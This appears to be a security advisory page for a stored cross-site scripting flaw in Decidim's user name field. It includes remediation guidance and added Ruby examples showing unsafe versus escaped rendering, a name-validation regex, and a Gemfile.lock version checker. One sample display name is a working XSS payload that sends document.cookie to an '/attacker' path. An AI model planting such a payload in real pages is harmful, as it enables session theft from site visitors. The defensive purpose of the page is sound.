CVSS Vector (NVD)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Description (NVD)
Impact
A stored code execution vulnerability in the user name field allows a low-privileged attacker to execute arbitrary code in the context of any user who passively visits a comment page, resulting in high confidentiality and integrity impact across security boundaries.
Patches
N/A
Workarounds
Not available
References
OWASP ASVS v4.0.3-5.1.3
Credits
This issue was discovered in a security audit organized by octree and carried out by Secu Labs against Decidim, financed by the city of Lausanne (Switzerland).
Analysis (AI)
Stored code execution in Decidim's user name field allows authenticated attackers with low privileges to inject malicious code that executes in victims' browsers when they view comment pages, enabling account takeover and data theft across trust boundaries. The vulnerability affects the decidim-core RubyGem component. …
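The Impact and Analysis sections above describe the bug only at the level of "markup in the user name field reaches every visitor of a comment page". The following Ruby example is added here to make that concrete; it is not Decidim's code and not the auditors' proof of concept. It assumes a simplified comment renderer in which the author name is interpolated into HTML, shows the unescaped version beside the output-escaped fix, and adds the input-side check that the cited ASVS control (5.1.3, positive input validation) calls for, which doubles as an audit over existing account names. The payload string is constructed for illustration; the page does not give the actual payload.

```ruby
require "erb"

# Constructed sample inputs (not from the audit). An attacker only needs an
# ordinary low-privileged account to set a display name like this one.
MALICIOUS_NAME = %q{<img src=x onerror="fetch('/attacker?c='+document.cookie)">}
BENIGN_NAME = "Ana & Bob"

# Vulnerable pattern (assumed, not Decidim's actual template): the author name
# is concatenated straight into the comment markup. The comment body is escaped,
# so the usual "body" test case looks fine, but the name is not, so any markup
# stored in it is emitted verbatim to every visitor of the comment page.
def render_comment_unsafe(author_name, body)
  "<div class=\"comment\"><span class=\"author\">#{author_name}</span>" \
  "<p>#{ERB::Util.html_escape(body)}</p></div>"
end

# Hardened form: every untrusted value is HTML-escaped at output time, the
# name included. ERB::Util.html_escape converts & < > " ' to entities.
def render_comment_safe(author_name, body)
  "<div class=\"comment\"><span class=\"author\">#{ERB::Util.html_escape(author_name)}</span>" \
  "<p>#{ERB::Util.html_escape(body)}</p></div>"
end

# Defence in depth at input time: a display name has no business containing
# tag delimiters, numeric entities or a javascript: scheme. This does not
# replace output escaping; it limits what can be stored in the first place.
NAME_MARKUP = /[<>]|&#|javascript:/i

def name_contains_markup?(name)
  !!(name =~ NAME_MARKUP)
end

# Run over the names already in the database to find accounts that stored
# markup before the fix was deployed.
def audit_names(names)
  names.select { |n| name_contains_markup?(n) }
end

if __FILE__ == $PROGRAM_NAME
  puts render_comment_unsafe(MALICIOUS_NAME, "hello")
  puts render_comment_safe(MALICIOUS_NAME, "hello")
  p audit_names([BENIGN_NAME, MALICIOUS_NAME, "plain"])
end
```

The input-side check deliberately flags the ampersand-digit sequence of numeric entities but not a bare "&", so a name such as "Ana & Bob" passes validation and is still rendered correctly by the escaping renderer; the two layers are meant to work together, not to substitute for each other.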
Remediation (AI)
Within 24 hours: Inventory all Decidim installations and identify current decidim-core versions in production. Within 7 days: Upgrade all instances to decidim-core version 0.30.5 (for 0.30.x branch) or 0.31.1 (for 0.31.x branch) or later; if on versions prior to 0.30, evaluate upgrade path to supported branches. …
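For the inventory step above, the following Ruby snippet is an added example (not part of the page or of Decidim) that classifies a deployment from its Gemfile.lock against the fixed versions named in the remediation text, 0.30.5 for the 0.30.x branch and 0.31.1 for the 0.31.x branch. The lockfile excerpt is constructed; the `assess` return values are this example's own convention.

```ruby
require "rubygems"

# Fixed versions as stated in the Remediation section of this page.
FIXED = {
  "0.30" => Gem::Version.new("0.30.5"),
  "0.31" => Gem::Version.new("0.31.1"),
}.freeze

# Constructed Gemfile.lock excerpt for illustration (not a real deployment).
# Note the dependency line "decidim-core (= 0.30.4)" that precedes the spec
# line; the parser below must skip it and read the resolved spec line.
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      decidim (0.30.4)
        decidim-core (= 0.30.4)
      decidim-core (0.30.4)
        active_model_serializers (~> 0.10.0)
LOCK

# Extract the resolved decidim-core version from a Gemfile.lock. Only a line
# whose parenthesised value starts with a digit is a spec line; dependency
# constraints such as "(= 0.30.4)" or "(~> 0.30)" are ignored.
def decidim_core_version(lockfile_text)
  m = lockfile_text.match(/^\s*decidim-core \((\d[^)]*)\)\s*$/)
  m && Gem::Version.new(m[1])
end

# :patched      at or above the fixed release for that branch
# :vulnerable   on a branch with a fix, but below it
# :unsupported  older than 0.30, which the page says needs an upgrade path
# :unknown      no decidim-core found, or a branch the page does not cover
def assess(version)
  return :unknown if version.nil?
  branch = version.segments[0, 2].join(".")
  fixed = FIXED[branch]
  if fixed
    version >= fixed ? :patched : :vulnerable
  elsif version < Gem::Version.new("0.30")
    :unsupported
  else
    :unknown
  end
end

if __FILE__ == $PROGRAM_NAME
  lock = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_LOCK
  v = decidim_core_version(lock)
  puts "decidim-core #{v || '(not found)'}: #{assess(v)}"
end
```

Run it as `ruby check.rb /path/to/Gemfile.lock` on each host from the inventory; with no argument it evaluates the embedded sample, which is on 0.30.4 and therefore reports as vulnerable.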
External Advisories
EUVD-2026-22024
GHSA-fc46-r95f-hq7g